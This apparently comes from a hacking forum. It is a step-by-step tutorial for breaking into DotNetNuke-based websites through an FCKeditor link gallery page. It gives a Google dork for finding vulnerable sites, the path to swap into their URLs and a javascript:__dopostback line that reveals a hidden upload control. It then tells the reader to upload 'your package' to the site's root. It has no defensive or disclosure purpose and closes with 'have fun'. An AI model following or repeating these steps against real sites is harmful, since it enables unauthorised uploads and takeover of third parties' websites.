step 1 :
http://www.google.com


:inurl:/tabid/36/language/en-us/default.aspx
dork to find the portal vulnerable sites
step 2:- select the site which you are comfortable with.


step 3:- for example take this site.


http://www.xyz.com/home/tabid/36/lan...s/default.aspx


step 4:- now replace


/home/tabid/36/language/en-us/default.aspx


with


this




/providers/htmleditorproviders/fck/fcklinkgallery.aspx


step 5:- you will get a link gallary page.so far so good!


step 6:- dont do anything for now, final stage approaching.


step 7:-now replace the url in the address bar with a simple script


javascript:__dopostback('ctlurl$cmdupload','')


step 8:-you will find the upload option


step 9:-select root


step 10:-upload your package


press thanks x)


this is the way that the new guy faz hack site with :p
have fun